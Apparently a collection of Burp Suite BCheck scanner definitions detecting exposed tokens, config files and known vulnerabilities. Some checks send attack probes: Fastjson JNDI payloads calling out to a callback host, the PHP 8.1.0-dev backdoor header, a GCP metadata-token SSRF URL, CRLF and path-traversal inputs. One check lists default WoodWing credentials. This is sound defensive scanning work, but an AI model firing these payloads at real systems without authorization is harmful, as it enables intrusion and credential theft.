tentative 13 | detail: "Zoho webhook token found in page." 
14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/aws-access-key-value.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "AWS Access Key ID Value" 4 | description: "Detects AWS Access Key IDs exposed in the response body." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "aws", "amazon" 7 | 8 | given response then 9 | if {latest.response} matches "\b(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "AWS Access Key ID detected in the response body." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /.github/workflows/issue_webhook.yml: -------------------------------------------------------------------------------- 1 | name: Issues Webhook 2 | 3 | on: 4 | issues: 5 | types: [opened, reopened] 6 | 7 | jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | 11 | steps: 12 | - name: Push to webhook 13 | run: | 14 | echo $AUTHOR $TITLE $LINK 15 | curl "$WEBHOOK" -X POST -H "Authorization: $AUTH_TOKEN" -d "$AUTHOR"$'\n'"$TITLE"$'\n'"$LINK" 16 | env: 17 | AUTHOR: ${{ github.event.issue.user.login }} 18 | TITLE: ${{ github.event.issue.title }} 19 | LINK: ${{ github.event.issue.html_url }} 20 | WEBHOOK: ${{ secrets.WEBHOOK_URL }} 21 | AUTH_TOKEN: ${{ secrets.AUTH_TOKEN }} 22 | 23 | -------------------------------------------------------------------------------- /.github/workflows/pr_webhook.yml: -------------------------------------------------------------------------------- 1 | name: Pull Request Webhook 2 | 3 | on: 4 | pull_request_target: 5 | types: [opened, reopened] 6 | 7 
| jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | 11 | steps: 12 | - name: Push to webhook 13 | run: | 14 | echo $AUTHOR $TITLE $LINK 15 | curl "$WEBHOOK" -X POST -H "Authorization: $AUTH_TOKEN" -d "$AUTHOR"$'\n'"$TITLE"$'\n'"$LINK" 16 | env: 17 | AUTHOR: ${{ github.event.pull_request.user.login }} 18 | TITLE: ${{ github.event.pull_request.title }} 19 | LINK: ${{ github.event.pull_request.html_url }} 20 | WEBHOOK: ${{ secrets.WEBHOOK_URL }} 21 | AUTH_TOKEN: ${{ secrets.AUTH_TOKEN }} 22 | -------------------------------------------------------------------------------- /other/JavaScript/malicious_polyfill_cdn.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Malicious Polyfill CDN In Use" 4 | description: "Look in responses to see if there are malicious Polyfill CDNs is in use" 5 | author: "KnugiHK" 6 | tags: "passive","javascript" 7 | 8 | given response then 9 | if {latest.response.body} matches "" then 10 | report issue: 11 | severity: high 12 | confidence: firm 13 | detail: "The malicious Polyfill CDN polyfill.io is used on the website." 14 | remediation: "Self-host a Polyfill service or use a more reliable CDN." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/aws-session-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "AWS Session Token" 4 | description: "Looks for AWS session token exposure in page source." 5 | author: "@puzzlepeaches" 6 | tags: "aws","amazon","token","exposure","session" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)(?:aws.?session|aws.?session.?token|aws.?token)[\"'`]?\s{0,30}(?::|=>|=)\s{0,30}[\"'`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "AWS Session token exposure found in page." 
14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/microsoft-teams-webhook.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Microsoft Teams Webhook Disclosure" 4 | description: "Detects a Microsoft Teams Webhook disclosure in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "microsoft" 7 | 8 | given response then 9 | if {latest.response} matches "https://outlook\.office\.com/webhook/[A-Za-z0-9\-@]+/IncomingWebhook/[A-Za-z0-9\-]+/[A-Za-z0-9\-]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Microsoft Teams Webhook disclosed in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/prometheus/exposed-prometheus-metrics.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Prometheus Metrics Publicly Available" 4 | description: "Prometheus Metrics Found" 5 | author: "Sourav Kalal" 6 | 7 | define: 8 | potential_path = "/metrics" 9 | 10 | given host then 11 | send request called check: 12 | method: "GET" 13 | path: {potential_path} 14 | 15 | if {check.response.status_code} is "200" and "memory" in {check.response.body} then 16 | report issue: 17 | severity: low 18 | confidence: certain 19 | detail: `Prometheus Metrics found at {potential_path}.` 20 | remediation: "Ensure your Prometheus Metrics is not exposed." 
21 | end if 22 | -------------------------------------------------------------------------------- /other/apache-mod_info.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Apache mod_info" 4 | description: "Check for Apache's mod_info pages" 5 | author: "pyllyukko" 6 | 7 | run for each: 8 | potential_path = 9 | "/server-status", 10 | "/server-info" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if {check.response.status_code} is "200" and "Apache Server" in {check.response.body} then 18 | report issue: 19 | severity: info 20 | confidence: certain 21 | detail: `Apache's mod_info page found at {potential_path}.` 22 | remediation: "Disable Apache's mod_info module." 23 | end if 24 | -------------------------------------------------------------------------------- /vulnerability-classes/injection/CRLFInjection.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CRLF Injection" 4 | description: "Checks for CRLF Injection" 5 | author: "0xGodson_" 6 | 7 | define: 8 | nonce = `{random_str(13)}` 9 | 10 | given request then 11 | send request called crlf: 12 | appending path: `%0d%0aX-TEST-Header:%20{nonce}%0d%0a` 13 | 14 | if `x-test-header: {to_lower({nonce})}` in {to_lower({crlf.response.headers})} then 15 | report issue: 16 | severity: low 17 | confidence: certain 18 | detail: "The application is vulnerable to CRLF Injection." 19 | remediation: "Strip any newline characters before passing content into the HTTP header." 
20 | end if 21 | -------------------------------------------------------------------------------- /examples/exposed-git-directory.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Host-level" 4 | description: "Tests for exposed git directory" 5 | author: "Carlos Montoya" 6 | 7 | run for each: 8 | # you could add more values to this list to make the check repeat 9 | potential_path = "/.git/config", "/.git/config~" 10 | 11 | given host then 12 | send request called check: 13 | method: "GET" 14 | path: {potential_path} 15 | 16 | if "[core]" in {check.response.body} then 17 | report issue: 18 | severity: info 19 | confidence: certain 20 | detail: `Git directory found at {potential_path}.` 21 | remediation: "Ensure your git directories are not exposed." 22 | end if 23 | -------------------------------------------------------------------------------- /other/PHP Laravel Debug Mode enabled.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "PHP Laravel Debug Mode enabled" 4 | description: "PHP Laravel with debug method enabled which shows the verbose error message" 5 | author: "Sourav Kalal" 6 | 7 | define: 8 | potential_path = "/_ignition/health-check" 9 | 10 | given host then 11 | send request called check: 12 | method: "GET" 13 | path: {potential_path} 14 | 15 | if {check.response.status_code} is "200" and "execute_command" in {check.response.body} then 16 | report issue: 17 | severity: medium 18 | confidence: certain 19 | detail: `PHP Laravel Debug Mode enabled.` 20 | remediation: "Ensure your APP_DEBUG is set to False." 
21 | end if 22 | -------------------------------------------------------------------------------- /other/technologies/WoodWing-Detect.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Detect WoodWing Studio Server Panel" 4 | description: "Default creds: username: woodwing password: ww" 5 | author: "xelkomy" 6 | 7 | define: 8 | potential_path = "/StudioServer/server/apps/login.php" 9 | 10 | given host then 11 | send request called check: 12 | method: "GET" 13 | path: {potential_path} 14 | 15 | if "WoodWing Studio Server" in {check.response.body} then 16 | report issue: 17 | severity: info 18 | confidence: certain 19 | detail: `WoodWing Studio Server Panel at {potential_path}.` 20 | remediation: "Maybe there is defult creds impact Default creds: username: woodwing password: ww." 21 | end if -------------------------------------------------------------------------------- /other/recon/backend-language.bcheck: -------------------------------------------------------------------------------- 1 | #Verified: Yes 2 | metadata: 3 | language: v1-beta 4 | name: "Backend-language" 5 | description: "Passive scan for the programming language used by the backend" 6 | author: "Brumens" 7 | tags: "passive", "live", "backend", "recon", "info", "lang", "language" 8 | 9 | define: 10 | desc = "The programming language of the application has been discovered" 11 | #reme = "" 12 | 13 | given response then 14 | if {latest.response} matches "href(| )=(| )[\"'](?!((http[s]?:)?\/\/))[^\"'\r\n]+\.(php|asp(|x)|jsp|cfm|java|rb|py|go|erlang)([?#;&][^\"'\r\n]+|)[\"']" then 15 | report issue: 16 | severity: info 17 | confidence: firm 18 | detail: {desc} 19 | #remediation: {reme} 20 | end if 21 | -------------------------------------------------------------------------------- /other/takeover-shopify.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: 
v1-beta 3 | name: "Shopify subdomain takeover" 4 | description: "Possible sub-domain takeover | Shopify" 5 | tags: "passive,shopify,takeover,cloud" 6 | author: "Milad Fadavvi" 7 | 8 | 9 | given response then 10 | if ("To finish setting up your new web address, go to your domain settings, click \"Connect existing domain\"" in {latest.response} or "Sorry, this shop is currently unavailable." in {latest.response}) and "shop-not-found" in {latest.response} then 11 | report issue: 12 | severity: high 13 | confidence: firm 14 | detail: "info --> https://github.com/EdOverflow/can-i-take-over-xyz/issues/46" 15 | remediation: "Delete the related DNS record." 16 | end if 17 | -------------------------------------------------------------------------------- /other/files/configs/gitlab-ci-discovery.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "GitLab CI Exposure" 4 | description: "Tests for exposed GitLab CI files" 5 | author: "Patrick Harrison" 6 | tags: "exposure", "gitlab", "config", "file" 7 | 8 | run for each: 9 | potential_path = "/.gitlab-ci.yml" 10 | 11 | given host then 12 | send request called check: 13 | method: "GET" 14 | path: {potential_path} 15 | 16 | if "stage" in {check.response.body} then 17 | report issue: 18 | severity: low 19 | confidence: firm 20 | detail: `GitLab CI file found at {check.request.url}` 21 | remediation: "Ensure your configuration files are not exposed." 22 | end if 23 | -------------------------------------------------------------------------------- /other/tokens/slack-webhook-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Slack Webhook Disclosure" 4 | description: "Detects exposed Slack Webhook URLs in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "slack" 7 | 8 | given response then 9 | if {latest.response} matches "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Slack webhook URL found in page source. Inappropriate disclosure of such URLs can lead to unauthorized messages being sent to the associated Slack channel." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/gcp.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Response-level" 4 | description: "Checking GCP Service Account Access Token via SSRF" 5 | tags: "GCP", "SSRF" 6 | author: "Joe Thiha" 7 | 8 | define: 9 | potential_path = "http://metadata.google.internal/computeMetada/v1/instance/service-accounts/default/token" 10 | 11 | given insertion point then 12 | send payload: 13 | appending: {potential_path} 14 | 15 | if {latest.response.status_code} is "200" then 16 | if("access_token:" in {latest.response.body})then 17 | report issue: 18 | severity: high 19 | confidence: firm 20 | detail: "Leaked GCP Service Account Access Token via SSRF." 21 | remediation: "Restrict access to the metadat url." 22 | end if 23 | end if 24 | 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /other/tokens/tugboat-config-exposure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Tugboat Configuration File Exposure" 4 | description: "A Tugboat configuration file was discovered. Tugboat is a command line tool for interacting with DigitalOcean droplets." 
5 | author: "@puzzlepeaches" 6 | tags: "tugboat","config","exposure" 7 | 8 | given response then 9 | if {latest.response} matches "access_token: .*" then 10 | if {latest.response} matches "authentication" and {latest.response} matches "access_token" and {latest.response} matches "ssh_user" then 11 | report issue: 12 | severity: low 13 | confidence: tentative 14 | detail: "Tugboat configuration file was discovered. Tugboat is a command line tool for interacting with DigitalOcean droplets." 15 | end if 16 | end if -------------------------------------------------------------------------------- /vulnerability-classes/injection/SSRFInjection.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "SSRF in each insetpoint" 4 | description: "Insert an Collaborator address into each parameter to detect SSRF" 5 | author: "xelkomy" 6 | 7 | define: 8 | ssrfaddress=`{generate_collaborator_address()}` 9 | 10 | # we will automatically insert into nested insertion points 11 | given insertion point then 12 | send payload: 13 | appending: {ssrfaddress} 14 | 15 | if http interactions then 16 | report issue: 17 | severity: high 18 | confidence: firm 19 | detail: "SSRF Discovery by BCheck: Explore the Request Tab to Observe the Payload and Attempt Self-Capture" 20 | remediation: "Implement SSRF remediation measures to mitigate the vulnerability." 21 | end if 22 | -------------------------------------------------------------------------------- /other/Cookie-SameSite-Disabled.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "SameSite attribute was set to None" 4 | description: "Detect when a cookie set the SameSite attribute to None." 
5 | author: "Dominique Righetto" 6 | tags: "passive","informative" 7 | 8 | given response then 9 | # Source: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie#samesitesamesite-value 10 | if {latest.response} matches "(?i)(SameSite=None)" then 11 | report issue: 12 | severity: info 13 | confidence: firm 14 | detail: "The SameSite security attribute is set to None so the protection is disabled." 15 | remediation: "It is recommended to use the value Lax or Strict for the SameSite attribute to leverage the protection provided." 16 | end if 17 | -------------------------------------------------------------------------------- /other/missing-security-txt.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Missing security.txt" 4 | description: "Checks for a missing security.txt according to RFC 9116" 5 | author: "Patrick Schmid" 6 | 7 | define: 8 | potential_path = 9 | "/.well-known/security.txt" 10 | 11 | given host then 12 | send request called check: 13 | method: "GET" 14 | path: {potential_path} 15 | 16 | if not("Contact:" in {check.response.body}) then 17 | report issue: 18 | severity: info 19 | confidence: certain 20 | detail: `No security.txt could be found at {potential_path}.` 21 | remediation: "Consider describing your security vulnerability disclosure process in a security.txt file according to RFC 9116 (https://www.rfc-editor.org/rfc/rfc9116)." 
22 | end if 23 | -------------------------------------------------------------------------------- /other/Apache Struts OGNL Console Publicly Accessible.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Apache Struts OGNL Console Publicly Accessible" 4 | description: "Apache Struts OGNL Console is public and could be exploited to gain access" 5 | author: "Sourav Kalal" 6 | 7 | define: 8 | potential_path = "/struts/webconsole.html?debug=console" 9 | 10 | given host then 11 | send request called check: 12 | method: "GET" 13 | path: {potential_path} 14 | 15 | if {check.response.status_code} is "200" and "title>OGNL Console" in {check.response.body} then 16 | report issue: 17 | severity: low 18 | confidence: firm 19 | detail: `Apache Struts OGNL Console found at {potential_path}.` 20 | remediation: "Restrict access to the struts console." 21 | end if 22 | -------------------------------------------------------------------------------- /other/shiro/shiro_active.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shiro Cookie Check Active" 4 | description: "Detects Shiro Vulnerability by Manipulating Cookie" 5 | author: "timeshatter" 6 | tags: "Shiro,active" 7 | 8 | define: 9 | shiroExploit = "rememberMe=1" 10 | issueDetail = "Shiro Cookie Exploit Detected: rememberMe=deleteMe" 11 | issueRemediation = "Immediately investigate and fix the Shiro vulnerability." 
12 | 13 | given request then 14 | send request called check: 15 | replacing headers: 16 | "Cookie": {shiroExploit} 17 | 18 | if "rememberMe=deleteMe" in {check.response} then 19 | report issue: 20 | severity: info 21 | confidence: certain 22 | detail: {issueDetail} 23 | remediation: {issueRemediation} 24 | end if 25 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2018-11759-Apache mod_jk access control bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CVE-2018-11759 - Apache mod_jk access control bypass" 4 | description: "Checks for CVE-2018-11759 -Apache mod_jk access control bypass" 5 | author: "CDonkin" 6 | tags: "CVE-2018-11759", "mod_jk" 7 | 8 | run for each: 9 | potential_path = 10 | "/jkstatus", 11 | "/jkstatus;" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if "JK Status Manager" in {check.response.body} then 19 | report issue: 20 | severity: high 21 | confidence: certain 22 | detail: `jkstatus found at {potential_path}.` 23 | remediation: "Apply the relevant patches" 24 | end if 25 | 26 | -------------------------------------------------------------------------------- /other/files/configs/git-config-discovery.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Git Configuration Check" 4 | description: "Tests for exposed git config in current path as opposed to just root directory of site." 
5 | author: "github.com/BuffaloWill" 6 | tags: "exposure", "git", "config", "file" 7 | 8 | run for each: 9 | potential_path = 10 | ".git/config", 11 | ".git/config~" 12 | 13 | given request then 14 | send request called check: 15 | method: "GET" 16 | replacing path: `{regex_replace({regex_replace({base.request.url},"^.*?\/.*?\/.*?\/","/")},"([^/]+)$", "")}{potential_path}` 17 | 18 | if "[core]" in {check.response.body} then 19 | report issue: 20 | severity: low 21 | confidence: tentative 22 | detail: `Git configuration found at {potential_path}.` 23 | end if -------------------------------------------------------------------------------- /other/exposed-simple-saml-php-ui.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Simple SAML php Admin Interface" 4 | description: "Tests for exposed admin interface of Simple SAML php" 5 | author: "Patrick Schmid" 6 | 7 | run for each: 8 | potential_path = 9 | "/saml/module.php/core/login-admin.php?ReturnTo=", 10 | "/sso/module.php/core/login-admin.php?ReturnTo=" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if "loginuserpass.php" in {check.response.body} then 18 | report issue: 19 | severity: info 20 | confidence: certain 21 | detail: `Simple SAML php admin interface found at {potential_path}.` 22 | remediation: "Ensure your Simple SAML php admin interface is not exposed." 
23 | end if 24 | -------------------------------------------------------------------------------- /other/files/000~ROOT~000-exposed.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Filesystem exposure via /home/000~ROOT~000/" 4 | description: "Tests for exposed 000~ROOT~000 in current path and at the root directory of site" 5 | author: "r3nt0n" 6 | tags: "active", "exposure", "path traversal" 7 | 8 | run for each: 9 | payloads_array = 10 | "/home/000~ROOT~000/", 11 | `{regex_replace(base.request.url.path, "/$", "")}/home/000~ROOT~000/` 12 | 13 | given path then 14 | send request: 15 | replacing method: "GET" 16 | replacing path: `{payloads_array}` 17 | 18 | if "Index of" in {latest.response} then 19 | report issue: 20 | severity: high 21 | confidence: firm 22 | detail: "Potential exposure of entire filesystem via \"/home/000~ROOT~000\" path" 23 | end if 24 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2022-22978-spring_security_auth_bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2022-22978 Spring Security Authorization Bypass" 4 | description: "find CVE-2022-22978 Spring Security Authorization Bypass" 5 | author: "timeshatter" 6 | tags: "Spring Security Authorization Bypass","CVE-2022-22978" 7 | 8 | given request then 9 | if {base.response.status_code} is "403" then 10 | send request called check: 11 | appending path: "%0a" 12 | 13 | if {check.response.status_code} is "200" then 14 | report issue: 15 | severity: high 16 | confidence: tentative 17 | detail: "find CVE-2022-22978 Spring Security Authorization Bypass" 18 | remediation: "update Spring Security Authorization." 
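# (tail of the preceding check; its header lies before this excerpt)
    end if
end if

# ==== /other/Blind-SSRF-By-Collaborator.bcheck ====
metadata:
    language: v1-beta
    name: "Blind SSRF By Collaborator"
    description: "Blind SSRF with proxy param or url param"
    author: "Jumbo@chinabaiker.com"

define:
    # Two distinct Collaborator hosts so the callback tells which parameter was followed.
    proxy_ssrf = `http://{generate_collaborator_address()}/proxy`
    url_ssrf = `https://{generate_collaborator_address()}/url`

given request then
    send request:
        appending queries:
            `proxy={proxy_ssrf}`,
            `url={url_ssrf}`
    # Only an HTTP callback counts. A DNS-only interaction (the host resolved the
    # Collaborator name but never connected) is not reported; widen to
    # "any interactions" if that weaker signal should be surfaced too.
    if http interactions then
        report issue:
            severity: high
            confidence: firm
            detail: "The site request url params or proxy params, There may be ssrf vulnerabilities."
            remediation: "Ensure that the site does not directly request URLs from the proxy param or url param."
    end if

# ==== /other/configs/apache-airflow-config-exposure.bcheck ====
metadata:
    language: v2-beta
    name: "Apache Airflow Configuration Page"
    description: "Apache Airflow configuration page was detected"
    author: "Nithissh"

run for each:
    # you could add more values to this list to make the check repeat
    # NOTE(review): no leading "/" here, unlike the sibling path checks — confirm
    # the request actually goes to /airflow.cfg.
    potential_path =
        "airflow.cfg"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # Both INI section headers must be present to avoid matching unrelated text.
    if "[core]" in {check.response.body} and "[api]" in {check.response.body} then
        report issue:
            severity: medium
            confidence: certain
            detail: `Apache airflow configuration page found on {potential_path}.`
            remediation: "Ensure your Apache airflow configuration page are not exposed."
    end if

# ==== /other/php-8.1.0-dev-backdoor.bcheck ====
metadata:
    language: v2-beta
    name: "PHP 8.1.0-dev Backdoor - Code Injection"
    description: "Detect servers running PHP 8.1.0-dev, which was released with a backdoor allowing Code Injection"
    author: "r3nt0n"
    tags: "active", "php", "code injection", "backdoor"

define:
    # Harmless arithmetic; the check looks for its printed result rather than
    # for any side effect on the host.
    payload = "zerodiumvar_dump(1337*1337)"

given host then
    send request:
        appending headers:
            # The misspelt header name ("User-Agentt") is the trigger the backdoor listens for.
            "User-Agentt": `{payload};`

    # 1337*1337 = 1787569; seeing it in the response proves the expression was evaluated.
    if "int(1787569)" in {latest.response} then
        report issue:
            severity: high
            confidence: firm
            detail: `Code injection via backdoor introduced in PHP 8.1.0-dev:

            - https://news-web.php.net/php.internals/113838
            - https://flast101.github.io/php-8.1.0-dev-backdoor-rce/`
    end if

# ==== /other/IBM Websphere Source File Publicly Accessible.bcheck ====
metadata:
    language: v1-beta
    name: "IBM Websphere Portal Information Disclosure"
    description: "IBM Websphere Source File Publicly Accessible "
    author: "Sourav Kalal"

run for each:
    potential_path =
        "/iojs/%2e/WEB-INF/web.xml",
        "/iojs/%2e/WEB-INF/",
        "/iojs/%2e/META-INF/"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # Parenthesised so the 200 requirement applies to both body markers; written
    # as "A and B or C" a 404 page mentioning "servlet" would have been reported.
    if {check.response.status_code} is "200" and ("web-app" in {check.response.body} or "servlet" in {check.response.body}) then
        report issue:
            severity: medium
            confidence: firm
            detail: `IBM Websphere Source File found at {potential_path}.`
            remediation: "Upgrade the WebSphere Portal."
    end if

# ==== /other/ntlm-authentication-discovery.bcheck ====
metadata:
    language: v1-beta
    name: "NTLM Authentication Detection"
    description: "Detects NTLM authentication on non-standard directories."
    author: "@puzzlepeaches"
    tags: "login", "ntlm", "authentication"

given request then
    send request called check:
        method: "GET"
        appending headers:
            "Authorization": "NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAgAAAAAAAAACAAAAA="

    # A 401 that advertises NTLM in WWW-Authenticate is taken as the endpoint
    # negotiating NTLM; no credentials are exercised.
    if {check.response.status_code} is "401" and {check.response.headers} matches "WWW-Authenticate: NTLM" then
        report issue:
            severity: low
            confidence: firm
            detail: "NTLM authentication is enabled on a non-standard directory."
            remediation: "Disable NTLM authentication in favor of modern authentication protocols."
    end if

# ==== /other/fastjson/Fastjson-1.2.62-Deserialization-RCE.bcheck ====
metadata:
    language: v1-beta
    name: "Fastjson 1.2.62 Deserialization RCE"
    description: "https://paper.seebug.org/1192/"
    author: "Javeley"
    tags: "Fastjson", "Deserialization","RCE","Alibaba"

define:
    # "\{" escapes the literal brace because {...} interpolates inside backticks.
    payload = `\{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://{generate_collaborator_address()}/{random_str(4)}"}`

given request then
    # Only fire on requests that already carry a JSON object body.
    if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then
        send request:
            body: {payload}

        # A DNS lookup of the Collaborator name is enough to show the JNDI
        # reference was resolved.
        if dns interactions then
            report issue:
                severity: high
                confidence: certain
                # NOTE(review): detail and remediation are bare links; a one-line
                # summary and an explicit "upgrade Fastjson" would make the finding
                # self-contained in reports.
                detail: "https://paper.seebug.org/1192/."
                remediation: "https://paper.seebug.org/1192/."
        end if
    end if

# ==== /other/configs/dockerrun-aws-config-page-exposure.bcheck ====
metadata:
    language: v2-beta
    name: "Dockerrun AWS Configuration Page Exposed"
    description: "Dockerrun AWS configuration page was detected"
    author: "Nithissh"

run for each:
    # you could add more values to this list to make the check repeat
    potential_path =
        "/Dockerrun.aws.json"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # {latest.response} covers headers and body; both markers must be present.
    if "AWSEBDockerrunVersion" in {latest.response} and "containerDefinitions" in {latest.response} then
        report issue:
            severity: medium
            confidence: certain
            detail: `Dockerrun AWS configuration page exposed on {potential_path}.`
            remediation: "Make sure to disable the configuration page to public"
    end if

# ==== /other/go debug pprof exposed.bcheck ====
metadata:
    language: v1-beta
    name: "go debug pprof exposed"
    description: "go /debug/pprof is exposed this endpoint can leak sensitive information"
    author: "Mateusz Dabrowski (dbrwsky)"
    tags: "go", "debug", "exposure"

run for each:
    potential_path = "/debug/pprof"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # Status, the pprof index banner and an HTML content type are all required.
    if {check.response.status_code} is "200" and "Types of profiles available:" in {check.response.body} and "text/html" in {check.response.headers} then
        report issue:
            severity: medium
            confidence: certain
            detail: `go /debug/pprof is exposed this endpoint can leak sensitive information`
            remediation: "Restrict access to /debug/pprof/ endpoint"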
end if 23 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2001-0537 CISCO Authentication Bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2001-0537 CISCO Authentication Bypass" 4 | description: "Checks for CVE-2001-0537" 5 | author: "Ollie Whitehouse" 6 | tags: "CVE-2001-0537 CVE" 7 | 8 | define: 9 | potential_path = 10 | "/level/16/exec/show%20privilege" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | # Checks that we get a 200 AND that the output we expect in the result 18 | if {check.response.status_code} is "200" and "Current privilege level is" in {check.response.body} then 19 | report issue: 20 | severity: high 21 | confidence: certain 22 | detail: "Router is vulnerable to the authentication bypass vulnerability CVE-2001-0537" 23 | remediation: "Patch to a non vulnerable version" 24 | end if 25 | -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.41-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.41 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload = `\{"@type":"Lcom.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}` 10 | 11 | given request then 12 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 13 | send request: 14 | body: {payload} 15 | 16 | if dns interactions then 17 | report issue: 18 | severity: high 19 | confidence: certain 20 | detail: "https://paper.seebug.org/1192/." 
21 | remediation: "https://paper.seebug.org/1192/." 22 | end if 23 | end if 24 | -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.24-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.24 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload = 10 | `\{"b":\{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}}` 11 | 12 | given request then 13 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 14 | send request: 15 | body: {payload} 16 | 17 | if dns interactions then 18 | report issue: 19 | severity: high 20 | confidence: certain 21 | detail: "https://paper.seebug.org/1192/." 22 | remediation: "https://paper.seebug.org/1192/." 
